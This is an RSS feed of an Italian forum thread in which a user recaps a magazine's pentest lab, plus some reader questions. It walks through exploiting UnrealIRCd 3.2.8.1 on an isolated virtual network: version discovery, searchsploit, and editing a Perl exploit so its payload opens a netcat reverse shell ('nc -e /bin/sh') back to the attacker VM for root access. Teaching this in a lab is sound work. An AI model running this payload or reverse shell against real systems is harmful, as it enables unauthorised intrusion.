<?xml version="1.0" encoding="UTF-8"?>        <rss version="2.0"
             xmlns:atom="http://www.w3.org/2005/Atom"
             xmlns:dc="http://purl.org/dc/elements/1.1/"
             xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
             xmlns:admin="http://webns.net/mvcb/"
             xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
             xmlns:content="http://purl.org/rss/1.0/modules/content/">
        <channel>
            <title>
									Riepilogo laboratorio di pentest. - Annunci				            </title>
            <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/</link>
            <description>Unisciti alla Comunità di Hacker Journal. Iscriviti ora al nostro Forum.</description>
            <language>it-IT</language>
            <lastBuildDate>Fri, 10 Jul 2026 20:31:58 +0000</lastBuildDate>
            <generator>wpForo</generator>
            <ttl>60</ttl>
							                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-1035</link>
                        <pubDate>Thu, 16 Apr 2020 10:07:25 +0000</pubDate>
                        <description><![CDATA[@whistler ho eseguito il codice hj_tool.sh ma dice &quot;invalid port 0&quot;.
E non mi da nessuna lista di utenti.]]></description>
                        <content:encoded><![CDATA[<p>@whistler ho eseguito il codice hj_tool.sh ma dice "invalid port 0".</p>
<p>E non mi da nessuna lista di utenti.</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>grigo777</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-1035</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-1004</link>
                        <pubDate>Fri, 14 Feb 2020 09:30:35 +0000</pubDate>
                        <description><![CDATA[@whistler Lo script non funziona. Una volta modificato come da istruzioni e lanciato il comando, l&#039;output è una sequenza infinita di messaggi del tipo seguente::irc.Metasploitable.LAN 451 PI...]]></description>
                        <content:encoded><![CDATA[<p>@whistler Lo script non funziona. Una volta modificato come da istruzioni e lanciato il comando, l'output è una sequenza infinita di messaggi del tipo seguente:<br /><br />:irc.Metasploitable.LAN 451 PING :You have not registered<br /><br />Idee su come si possa correggere?<br /><br /></p>
<p> </p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>SecurityBear</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-1004</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-381</link>
                        <pubDate>Tue, 26 Mar 2019 21:48:09 +0000</pubDate>
                        <description><![CDATA[Buonasera. Sullo script per automatizzare l&#039;attacco al SMTP mi restituisce invalid port 0. Come posso risolvere il problema?]]></description>
                        <content:encoded><![CDATA[<p>Buonasera. Sullo script per automatizzare l'attacco al SMTP mi restituisce invalid port 0. Come posso risolvere il problema?</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>DrFreud94</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-381</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-375</link>
                        <pubDate>Sat, 16 Mar 2019 12:42:01 +0000</pubDate>
                        <description><![CDATA[14.5 COMPRENDIAMO MEGLIO L&#039;EXPLOIT GRAZIE A WIRESHARK.Per capire meglio qual è il problema con il nostro exploit faremo qualche analisi del traffico dati scambiato tra le due VM.Lanciamo wir...]]></description>
                        <content:encoded><![CDATA[<p>14.5 COMPRENDIAMO MEGLIO L'EXPLOIT GRAZIE A WIRESHARK.</p><p>Per capire meglio qual è il problema con il nostro exploit faremo qualche analisi del traffico dati scambiato tra le due VM.<br />Lanciamo wireshark e impostiamo il seguente filtro nella barra in alto:</p><p>ip.dst==210.100.1.1 || ip.dst==212.100.1.2</p><p>e lanciamo nuovamente il comando come abbiamo fatto prima</p><p>#perl ./unrealIRC_tool.pl www.labpentest.hj 6667 1</p><p>Analizzando bene il traffico (concentratevi sui pacchetti tcp anche con un ulteriore filtro se serve) si evince come il tool chiuda la connessione tramite un pacchetto TCP con flag RST.<br />Dunque è il tool che non aspetta la risposta della macchina vittima e di conseguenza la sua shell.<br />Modifichiamo nuovamente il tool sulla riga che controlla l'esecuzione dell'opzione 1 dello script con le seguenti righe:</p><p>if($type eq "1")<br />{<br />    print $sockd "$payload1";<br />    until (1 eq 0)<br />    {<br />        print $sockd "PING hj\n";<br />        $carattere='';<br />        until ($carattere eq "\n")<br />        {<br />            sysread($sockd, $carattere, 1);<br />            print $carattere;<br />         }<br />    }<br />}</p><p>Salviamo e lanciamo nuovamente il tool sempre dopo aver avviato nc in ascolto sulla porta 3333 dalla quale verificheremo se l'exploit ha funzionato.<br />Proprio da qui lanciando il comando whoami vedremo che avremo ottenuto i privilegi di root.</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>Whistler</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-375</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-374</link>
                        <pubDate>Sat, 16 Mar 2019 12:40:01 +0000</pubDate>
                        <description><![CDATA[14.4 L&#039;EXPLOIT IN PERL: 13853.PL DIVENTA UNREALIRC_TOOL.PL.Iniziamo preparando una directory dedicata e copiamo al suo interno l&#039;exploit per poterlo modificare lasciando intatto l&#039;originale....]]></description>
                        <content:encoded><![CDATA[<p>14.4 L'EXPLOIT IN PERL: 13853.PL DIVENTA UNREALIRC_TOOL.PL.</p><p>Iniziamo preparando una directory dedicata e copiamo al suo interno l'exploit per poterlo modificare lasciando intatto l'originale.</p><p>#mkdir unrealircd<br />#cd unrealircd<br />#cp /usr/share/exploitdb/exploits/linux/remote/13853.pl ./unrealIRC_tool.pl</p><p>Passiamo ora ad analizzare l'exploit con un editor a piacere e scopriremo che questo fa affidamento a programmi presenti nel web.<br />Poiché lavoriamo in un laboratorio virtuale non connesso a internet sono necessarie diverse modifiche.<br />La modifica che apporteremo ha come obbiettivo di far lanciare il seguente comando da remoto:</p><p>#nc -e /bin/sh 210.100.1.1 -p 3333</p><p>che consentirebbe di farci inviare una shell sulla macchina virtuale "Pentester".<br />Pertanto all'inizializzazione della variabile $payload1 cancelliamo il comando wget e i suoi argomenti e lo sostituiamo con il comando precedente.<br />Tale riga dovrà avere questo aspetto:</p><p>my $payload1='AB; nc -e /bin/sh 210.100.1.1 -p 3333';</p><p>salviamo il file e avviamo una seconda shell con netcat in ascolto sulla porta 3333.</p><p>#nc -l -p 3333</p><p>e avviamo il tool</p><p>#perl ./unrealIRC_tool.pl www.labpentest.hj 6667 1</p><p>Tuttavia qualcosa non va: il tool termina l'esecuzione quasi immediatamente..</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>Whistler</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-374</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-373</link>
                        <pubDate>Sat, 16 Mar 2019 12:38:33 +0000</pubDate>
                        <description><![CDATA[14.2 RFC 1459, LA LINGUA PARLATA DA QUESTO DEMONE.Per interagire con il servizio IRC dobbiamo consultare il documento RFC 1459, dal quale impariamo per cominciare i comandi base per iniziare...]]></description>
                        <content:encoded><![CDATA[<p>14.2 RFC 1459, LA LINGUA PARLATA DA QUESTO DEMONE.</p><p>Per interagire con il servizio IRC dobbiamo consultare il documento RFC 1459, dal quale impariamo per cominciare i comandi base per iniziare a inviare messaggi e dunque nella shell dove è in esecuzione nc cominciamo con:</p><p>PASS password<br />NICK HackerJournal<br />USER hj 0 * :hj</p><p>Ed è in questo momento che riceviamo l'informazione di interesse: il numero di versione 3.2.8.1</p><p>14.3 SEARCHSPLOIT.</p><p>Ora che conosciamo la versione di UnrealIRCd possiamo fare ricerche su eventuali exploit preesistenti che sfruttino vulnerabilità note: è il momento di searchsploit!</p><p>#searchsploit UnrealIRCd 3.2.8.1</p><p>questo comando ci permette di interrogare un vero e proprio database contenente informazioni sulle versioni vulnerabili di moltissimi programmi e relativi exploit che le sfruttano, già presenti nella nostra Kali Linux.</p><p>Dall'output la rivista ci consiglia di utilizzare il terzo exploit in quanto i primi due sono rispettivamente un modulo del famosissimo metasploit e l'altro serve per attaccare sistemi windows.</p><p>Sotto la voce "Path" possiamo vedere il percorso dove è situato l'exsploit che ci interessa.</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>Whistler</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/5/#post-373</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-372</link>
                        <pubDate>Sat, 16 Mar 2019 12:35:49 +0000</pubDate>
                        <description><![CDATA[14.0 IL PROTOCOLLO IRC.Salve a tutti e ben trovati, in questa guida la rivista ci insegnerà a violare il servizio IRC in esecuzione sulla macchina target.Questo protocollo tcp viene usato pe...]]></description>
                        <content:encoded><![CDATA[<p>14.0 IL PROTOCOLLO IRC.</p><p>Salve a tutti e ben trovati, in questa guida la rivista ci insegnerà a violare il servizio IRC in esecuzione sulla macchina target.<br />Questo protocollo tcp viene usato per consentire lo scambio di messaggi testuali tra due o più utenti.</p><p>14.1 UNREALIRCD.</p><p>Grazie al comando nmap possiamo vedere come il servizio IRC sia attivo sulla macchina virtuale "Web Server":</p><p>#nmap -sS -sV www.labpentest.hj -p 6667<br />                                         ^<br />                                          |<br />          (oppure) 212.100.1.2</p><p>che tuttavia darà un output un po' tirchio di informazioni e allora indaghiamo più a fondo con netcat:</p><p>#nc www.labpentest.hj -p 6667<br />                                               ^<br /></p><p>Dopo il lancio di nc aspettiamo che il server ci risponda e riceviamo due messaggi in cui il servizio ci informa che sta cercando di risolvere il nostro hostname ("looking up your hostname") e dopo non esserci riuscito che userà il nostro ip ("Couldn't resolve your hostname; using your IP istead.").<br />Infine UnrealIRCd resta in attesa di input dell'utente, chiarendo perché nmap non forniva informazioni sulla versione del servizio ovvero perché nmap usa una tecnica chiamata banner grabbing, ovvero "legge" i banner che vari servizi di rete mandano in output dopo aver stabilito la connessione, per poi risciverli nel suo output.</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>Whistler</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-372</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-371</link>
                        <pubDate>Sat, 16 Mar 2019 12:29:48 +0000</pubDate>
                        <description><![CDATA[Spero che questi riepiloghi ti siano stati di aiuto ;)L&#039;idea di usare pc diversi non è impossibile ma continuo a credere che quando si impara l&#039;uso di strumenti di cybersecurity sia meglio o...]]></description>
                        <content:encoded><![CDATA[<p>Spero che questi riepiloghi ti siano stati di aiuto ;)</p><p>L'idea di usare pc diversi non è impossibile ma continuo a credere che quando si impara l'uso di strumenti di cybersecurity sia meglio operare in un solo ambiente virtuale (e quindi non viene creato un vero traffico dati in una rete vera, necessaria se usi due o più computer distinti, in più le macchine virtuali sono più facili da gestire a mio avviso).</p><p>Comunque pensare in modo diverso dai manuali e/o dalle guide è di per se una bella cosa ;)</p><p>happy hacking!</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>Whistler</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-371</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-370</link>
                        <pubDate>Sat, 02 Mar 2019 11:34:53 +0000</pubDate>
                        <description><![CDATA[Ok come non detto. Sto seguendo la guida, e non si può giustamente]]></description>
                        <content:encoded><![CDATA[<p>Ok come non detto. Sto seguendo la guida, e non si può giustamente</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>DrFreud94</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-370</guid>
                    </item>
				                    <item>
                        <title>RISPONDI: Riepilogo laboratorio di pentest.</title>
                        <link>https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-369</link>
                        <pubDate>Thu, 28 Feb 2019 17:48:33 +0000</pubDate>
                        <description><![CDATA[Buonasera!!! Innanzitutto, siete grandiosi: mi sono abbonato alla vostra rivista e devo dire che fate veramente un lavoro eccelso, complimenti. Detto ciò, vorrei chiedere un&#039;informazione: po...]]></description>
                        <content:encoded><![CDATA[<p>Buonasera!!! Innanzitutto, siete grandiosi: mi sono abbonato alla vostra rivista e devo dire che fate veramente un lavoro eccelso, complimenti. Detto ciò, vorrei chiedere un'informazione: posso usare due pc distinti per creare il mio laboratorio?? Grazie e buon lavoro a tutti!!!!</p>]]></content:encoded>
						                            <category domain="https://hackerjournal.it/forum/main-forum/">Annunci</category>                        <dc:creator>DrFreud94</dc:creator>
                        <guid isPermaLink="true">https://hackerjournal.it/forum/main-forum/riepilogo-laboratorio-di-pentest/paged/4/#post-369</guid>
                    </item>
							        </channel>
        </rss>
		